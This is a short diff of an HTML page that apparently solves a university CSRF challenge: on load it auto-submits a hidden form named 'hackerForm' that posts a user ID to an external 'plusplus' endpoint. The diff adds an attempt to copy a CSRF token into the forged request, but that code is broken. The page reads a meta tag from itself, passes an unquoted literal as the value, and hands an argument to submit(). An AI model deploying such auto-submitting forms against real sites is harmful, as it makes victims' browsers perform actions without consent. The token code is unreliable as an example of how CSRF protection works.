--- a/index.html
+++ b/index.html
@@ -5,15 +5,17 @@
 <head>
 <title>Hello there</title>
 </head>
-<body onload="submitForm()">
+<body onload="submitForm(csrf)">
   <img src="http://klockren.se/klockren.png" style="width: 500px;" />
   <form name="hackerForm" action="https://snickerboa.it.liu.se/user/csrfchallengetwo/plusplus" method="POST">
     <input type="text" name="userId" value="87d0d107b1521d76bb260cc345c13bf90f6f4cd6" />
+    <input type="text" name="csrfToken" value =csrf />
     <input type="submit"/>
   </form>
 <script> 
 function submitForm(){
-  document.hackerForm.submit(); 
+  var csrf = document.querySelector('meta[name="csrf-token"]').content;
+  document.hackerForm.submit(csrf); 
  }
 </script> 
 
